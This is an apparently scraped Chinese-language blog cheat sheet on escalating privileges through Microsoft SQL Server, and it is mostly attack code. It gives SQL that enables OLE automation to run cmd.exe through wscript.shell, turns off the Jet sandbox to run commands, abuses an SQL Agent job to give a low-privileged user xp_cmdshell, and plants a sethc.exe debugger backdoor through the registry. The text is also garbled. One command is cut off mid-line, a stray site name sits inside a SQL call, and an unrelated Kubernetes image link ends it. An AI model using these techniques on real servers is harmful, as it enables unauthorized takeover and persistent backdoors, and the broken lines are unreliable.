xp_cmdshell提权
xp_cmdshell在前面写webshell已经讲解过了,在这里不在重复sp_oacreate提权
启用:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
关闭:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE WITH OVERRIDE;执行:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt' 
沙盒提权
1. exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
2. exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'
沙盒模式SandBoxMode参数含义(默认是2)
`0`:在任何所有者中禁止启用安全模式
`1` :为仅在允许范围内
`2` :必须在access模式下
`3`:完全开启
执行命令:
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Databasec:\windows\system32\i
public
USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL', www.2cto.com
@enabled = 1,
@description = 'This will give a low privileged user access to
xp_cmdshell',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresultset N''select ''''exec
master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'xp_regwrite
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution
Options\sethc.EXE','Debugger','REG_SZ','C:\WINDOWS\explorer.exe';
![[Kubernetes]5. k8s集群StatefulSet详解,以及数据持久化(SC PV PVC)](https://img-blog.csdnimg.cn/direct/2338c45a9af940bdb98f957efab8d406.png)
